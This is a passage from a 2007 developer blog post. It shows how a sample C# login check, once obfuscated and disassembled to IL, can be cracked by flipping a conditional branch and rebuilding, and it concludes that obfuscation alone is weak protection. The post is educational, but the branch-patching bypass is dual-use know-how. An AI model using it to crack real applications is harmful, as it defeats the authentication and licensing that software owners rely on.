</SPAN>IL_004b:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance void [System.Windows.Forms]System.Windows.Forms.Form::Close()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0050:<SPAN>&nbsp; </SPAN>ret<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>} // end of method eval_a::eval_a<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>So as we so now there lots of branches but with the bare eye inspection all of them are pointing to other branches that also is pointing to another one till they reach the real branch also with bare eye inspection none of them have condition they just branch so it would be very easy to spot the real branch that we are seeking at line IL_000f and do the same again by changing the condition from false to true and build the application and again we will get the previous result.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>But that because the code isn’t complex enough, what if we made the code a little bit more complex and used the previous way to obfuscate it?<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>So a code that looks like this<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>private void btnSubmit_Click(object sender, EventArgs e)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>if (CheckConnection())<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>if (CheckDB())<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>//we authenticate the user here using the method Authenticate()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>if (Authenticate())<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>//if the user credential is valid then...<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>MessageBox.Show("access granted");<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>this.Run();<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>else<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>//else we kick him out<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>MessageBox.Show("invalid credentials");<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>this.Close();<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>Would look like this after disassembling it<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>.method private hidebysig instance void <o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>eval_a(object A_0,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>class [mscorlib]System.EventArgs A_1) cil managed<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>// Code size<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>81 (0x51)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>.maxstack<SPAN>&nbsp; </SPAN>2<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>.locals init (int32 V_0)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0000:<SPAN>&nbsp; </SPAN>ldc.i4<SPAN>&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>0xa<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0005:<SPAN>&nbsp; </SPAN>stloc<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>V_0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0009:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_000a:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance bool eval_a::eval_c()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_000f:<SPAN>&nbsp; </SPAN>brtrue.s<SPAN>&nbsp; </SPAN>IL_0036<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0011:<SPAN>&nbsp; </SPAN>ldc.i4.1<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0012:<SPAN>&nbsp; </SPAN>br.s<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>IL_0017<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0014:<SPAN>&nbsp; </SPAN>ldc.i4.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0015:<SPAN>&nbsp; </SPAN>br.s<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>IL_0017<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0017:<SPAN>&nbsp; </SPAN>brfalse.s<SPAN>&nbsp; </SPAN>IL_0019<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0019:<SPAN>&nbsp; </SPAN>br.s <SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</SPAN>IL_001b<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_001b:<SPAN>&nbsp; </SPAN>ldstr<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>bytearray (57 39 59 39 5B 3F 5D 3B 5F 13 61 11 63 44 65 01<SPAN>&nbsp;&nbsp; </SPAN>// W9Y9[?];_.a.cDe.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>67 1A 69 0B 6B 02 6D 1A 6F 15 71 16 )<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>// g.i.k.m.o.q.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0020:<SPAN>&nbsp; </SPAN>ldloc<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>V_0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0024:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>string a$PST06000001(string,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>int32)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0029:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>valuetype [System.Windows.Forms]System.Windows.Forms.DialogResult [System.Windows.Forms]System.Windows.Forms.MessageBox::Show(string)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_002e:<SPAN>&nbsp; </SPAN>pop<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_002f:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0030:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance void eval_a::b()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0035:<SPAN>&nbsp; </SPAN>ret<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0036:<SPAN>&nbsp; </SPAN>ldstr<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>bytearray (57 31 59 34 5B 2A 5D 3F 5F 0C 61 0B 63 00 65 46<SPAN>&nbsp;&nbsp; </SPAN>// W1Y4[*]?_.a.c.eF<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>&nbsp;&nbsp;</SPAN>67 0B 69 18 6B 09 6D 0A 6F 15 71 1C 73 00 75 1F<SPAN>&nbsp;&nbsp; </SPAN>// g.i.k.m.o.q.s.u.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>77 19 79 16 7B 0F )<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>// w.y.{.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_003b:<SPAN>&nbsp; </SPAN>ldloc<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>V_0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_003f:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>string a$PST06000001(string,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>int32)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0044:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>valuetype [System.Windows.Forms]System.Windows.Forms.DialogResult [System.Windows.Forms]System.Windows.Forms.MessageBox::Show(string)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0049:<SPAN>&nbsp; </SPAN>pop<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_004a:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_004b:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance void [System.Windows.Forms]System.Windows.Forms.Form::Close()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0050:<SPAN>&nbsp; </SPAN>ret<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>} // end of method eval_a::eval_a<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>This time it’s harder to crack it but with bare eye inspection we can see there are only 2 conditioned branches at lines IL_000f and IL_0017 before where I found the Form::Close() method, so I can try my luck with them or I would just change the 1st one before where I found the Form::Close() method and the MessageBox::Show(string) method and build the application again and again I get another access granted message.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>So what is the conclusion?<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Well, obfuscation is a good way to protect our intellectual properties and it’s better than just leaving our confidential information in plain text, but as I’ve just demonstrated through this article we can’t rely on obfuscation to protect our applications as I’ve demonstrated how it’s easy to crack any application that is relying only on obfuscation for protection, and i did it without&nbsp;any special tools in only a&nbsp;few minutes.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>Thanks for reading and I’m waiting for your comments and feedback<o:p></o:p></SPAN></P> <P class=MsoNormal><o:p><FONT face=Calibri>&nbsp;</FONT></o:p></P> <P><A href="http://www.dotnetkicks.com/kick/?url=http://barmagy.com/blogs/infinite_loop/archive/2007/08/12/574.aspx"><IMG alt="kick it on DotNetKicks.com" src="http://www.dotnetkicks.com/Services/Images/KickItImageGenerator.ashx?url=http://barmagy.com/blogs/infinite_loop/archive/2007/08/12/574.aspx" border=0></A> </P> <P><A href="http://technorati.com/faves?sub=addfavbtn&amp;add=http://barmagy.com/blogs/infinite_loop/default.aspx"><IMG alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png"></A></P><img src="http://barmagy.com/aggbug.aspx?PostID=574" width="1" height="1">Fadyhtt